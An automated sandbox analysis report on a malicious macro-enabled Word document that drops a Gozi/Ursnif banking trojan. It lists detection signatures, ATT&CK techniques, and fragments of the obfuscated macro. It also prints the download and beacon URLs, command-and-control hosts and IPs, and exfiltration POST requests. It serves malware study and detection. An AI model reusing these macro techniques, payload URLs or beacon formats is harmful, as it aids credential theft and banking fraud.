Loading ...

Analysis Report e41ZuYVo64.docm

Overview

General Information

Joe Sandbox Version:26.0.0
Analysis ID:820806
Start date:20.03.2019
Start time:16:36:30
Joe Sandbox Product:Cloud
Overall analysis duration:0h 6m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:e41ZuYVo64.docm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:36
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spre.phis.bank.troj.spyw.expl.evad.winDOCM@39/29@13/5
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 81
  • Number of non-executed functions: 228
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .docm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, OSPPSVC.EXE
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid Accounts1Scripting32Hooking1Hooking1Rootkit2Hooking1Process Discovery3Application Deployment SoftwareEmail Collection1Data CompressedStandard Cryptographic Protocol1
Replication Through Removable MediaExploitation for Client Execution23Valid Accounts1Valid Accounts1Masquerading1Credentials in Files1Security Software Discovery431Remote ServicesMan in the Browser1Exfiltration Over Other Network MediumStandard Non-Application Layer Protocol4
Drive-by CompromiseWindows Management InstrumentationRegistry Run Keys / Startup Folder1Process Injection811Valid Accounts1Input CaptureRemote System Discovery1Windows Remote ManagementData from Local System1Automated ExfiltrationStandard Application Layer Protocol114
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection811Credentials in FilesSystem Network Configuration Discovery2Logon ScriptsInput CaptureData EncryptedConnection Proxy1
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessScripting32Account ManipulationSystem Information Discovery215Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information1Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port

Signature Overview

Click to jump to signature section


Spreading:

barindex
Performs a network lookup / discovery via net viewShow sources
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413ECF CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,HeapFree,HeapFree,3_2_01413ECF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00387121 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,16_2_00387121
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003874A1 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,16_2_003874A1
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00391663 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,16_2_00391663

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: text.doc.16147.scr.0.drJump to dropped file
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\text.doc.16147.scrJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: interruption.ru
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.83:49204 -> 31.148.219.163:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.83:49204 -> 31.148.219.163:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.1.83:49206 -> 37.152.176.90:80
Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.1.83:49207 -> 46.139.176.151:80
Found Tor onion addressShow sources
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: .onion/
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrLastTaskLastConfigCrHookOpHookExec.onion/TorClientTorCrc%s %s HTTP/1.1
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: myip.opendns.com
Source: unknownDNS query: name: myip.opendns.com
Uses nslookup.exe to query domainsShow sources
Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1 Jump to behavior
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
Source: unknownTCP traffic detected without corresponding DNS query: 31.148.219.163
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /free/t32.bin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: interruption.ru
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /images/logo2.png HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.148.219.163Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Host: profitsproject.ru
Source: global trafficHTTP traffic detected: POST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=382116919742642393088User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Content-Length: 401Host: profitsproject.ru
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /images/logo2.png HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.148.219.163Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /free/t32.bin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: interruption.ru
Source: global trafficHTTP traffic detected: GET /images/Tgxl4eQFLRJ828TTb5/PbE8UHAw2/a53P1QPrTXCRCRA71Ih_/2BBJPZYAZohZ0gbHdmM/JIeRuHUg0_2BloM9tUxzvE/TCq3W9vuEdgKl/IIJpn7iq/nCbHpa_2BOmrGlofqsHXa2m/l7EvsA_2Bv/RUcywXGJJ0g8335L4/wbisH67pflFl/VqPEdPBTaVc/TGPIvkfBJu3_2Fpm/Mu1_2B.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Host: profitsproject.ru
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: interruption.ru
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /images/tGVH9_2Ftdk/sHH41UkampY3Rs/AruAX_2BFORV1KTdlHf40/r6WQws0nBnEhQX03/cynMOwBSQIanvYM/Q4c4COJMjT5QueN5IE/sEKnnjm3Z/aQugH8GJbl7WwfFkU5qM/QNQ84zIsh2Ycx8Z7LQq/5VdFr7kpjPC9bebuaMzXSP/qpLb_2F8n3QIM/JLv3hF1o/uYK3inluwQhgfC5rYmWjZyI/kOeewEdSz/qd.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=382116919742642393088User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Content-Length: 401Host: profitsproject.ru
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.2Date: Wed, 20 Mar 2019 16:38:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1573Connection: closeReferrer-Policy: no-referrerData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64
Urls found in memory or binary dataShow sources
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: avicbrkr.exe, 00000010.00000002.1217084078.0039C000.00000004.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: avicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmpString found in binary or memory: http://interruption.ru/free/t32.bin
Source: avicbrkr.exe, 00000010.00000002.1219274895.019B8000.00000004.sdmpString found in binary or memory: http://interruption.ru/free/t64.bin
Source: explorer.exe, 00000005.00000000.1108931725.01CE0000.00000008.sdmpString found in binary or memory: http://www.%s.comPA

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojanShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff16_2_00371C56
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie16_2_00371C56

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable Editing, and then click Enable Content. " You are attempting to open a file that was created
Source: Document image extraction number: 0Screenshot OCR: enable content to see this document. " If the file opens in Protected VIew, click Enable Editing, a
Source: Document image extraction number: 1Screenshot OCR: Enable Editing and then click Enable Content ' You are attempting to open a hie that was created in
Source: Document image extraction number: 1Screenshot OCR: enable content to see this document " If the file opens in Protected view, click Enable Editing and
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: e41ZuYVo64.docmOLE, VBA macro line: If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then GoTo B0476
Source: e41ZuYVo64.docmOLE, VBA macro line: x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String environ: If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 ThenName: Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String environ: x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"Name: Document_Open
Document contains an embedded VBA with functions possibly related to HTTP operationsShow sources
Source: e41ZuYVo64.docmStream path 'VBA/JtuJu' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
Source: VBA code instrumentationOLE, VBA macro: Module JtuJu, Function I8BD2, found possibly 'XMLHttpRequest' functions response, responsebody, open, sendName: I8BD2
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\text.doc.16147.scrJump to dropped file
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Source: C:\Windows\System32\driverquery.exeWMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01412A7B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,3_2_01412A7B
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_0141271B NtCreateSection,memset,RtlNtStatusToDosError,NtClose,3_2_0141271B
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413C1B NtQuerySystemInformation,RtlNtStatusToDosError,3_2_01413C1B
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01411C29 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,3_2_01411C29
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413D34 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_01413D34
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_014126DC NtMapViewOfSection,RtlNtStatusToDosError,3_2_014126DC
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413CF3 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_01413CF3
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413789 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_01413789
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413CB2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_01413CB2
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413B27 memset,NtQueryInformationProcess,3_2_01413B27
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413D84 NtGetContextThread,NtGetContextThread,3_2_01413D84
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038A02C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,16_2_0038A02C
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038885B NtQueryInformationProcess,16_2_0038885B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003890AF memset,NtQueryInformationProcess,16_2_003890AF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038F8C5 GetVersion,NtCreateWaitablePort,NtCreateDirectoryObject,GetLastError,16_2_0038F8C5
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037C3A5 NtLoadKeyEx,memcpy,16_2_0037C3A5
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00386B82 NtCreateWaitablePort,memset,FlushFileBuffers,GetLastError,16_2_00386B82
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038940B NtQuerySystemInformation,RtlNtStatusToDosError,16_2_0038940B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00390D1B memset,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,NtCancelIoFile,LocalFree,NtCancelIoFile,16_2_00390D1B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038DE89 NtMapViewOfSection,RtlNtStatusToDosError,16_2_0038DE89
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038DEC8 NtCreateSection,memset,RtlNtStatusToDosError,NtClose,16_2_0038DEC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037DF75 NtUnmapViewOfSection,RtlNtStatusToDosError,HeapFree,16_2_0037DF75
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038CF9B memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,16_2_0038CF9B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037D7EE memset,CreateMutexA,GetLastError,CloseHandle,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,RtlAllocateHeap,LoadLibraryA,RtlAllocateHeap,wsprintfA,16_2_0037D7EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003A3040 NtProtectVirtualMemory,NtProtectVirtualMemory,16_2_003A3040
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00632A7B NtOpenProcess,NtOpenProcessToken,NtClose,NtClose,16_2_00632A7B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00633B27 memset,NtQueryInformationProcess,16_2_00633B27
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00631C29 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,16_2_00631C29
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0063271B NtCreateSection,memset,RtlNtStatusToDosError,NtClose,16_2_0063271B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00633C1B NtQuerySystemInformation,RtlNtStatusToDosError,16_2_00633C1B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_006326DC NtMapViewOfSection,RtlNtStatusToDosError,16_2_006326DC
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038D9D6 CreateProcessAsUserA,16_2_0038D9D6
Creates mutexesShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeMutant created: \Sessions\2\BaseNamedObjects\MutexHelper
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeMutant created: \Sessions\2\BaseNamedObjects\{04078505-93E6-D63A-3D78-776AC12C9B3E}
Detected potential crypto functionShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01414F583_2_01414F58
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038081916_2_00380819
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037F8F816_2_0037F8F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00374A2716_2_00374A27
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00383C1916_2_00383C19
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038440316_2_00384403
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00395C4C16_2_00395C4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003824E616_2_003824E6
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037FCC416_2_0037FCC4
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00384CC316_2_00384CC3
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037E76416_2_0037E764
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00634F5816_2_00634F58
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: e41ZuYVo64.docmOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Document contains embedded VBA macrosShow sources
Source: e41ZuYVo64.docmOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: e41ZuYVo64.docmOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: e41ZuYVo64.docmOLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document typeShow sources
Source: e41ZuYVo64.docmOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)Show sources
Source: 152E.bin1.13.drBinary string: Boot Device: \Device\HarddiskVolume1
Classification labelShow sources
Source: classification engineClassification label: mal100.spre.phis.bank.troj.spyw.expl.evad.winDOCM@39/29@13/5
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037B652 CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,Thread32Next,16_2_0037B652
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$1ZuYVo64.docmJump to behavior
Creates temporary filesShow sources
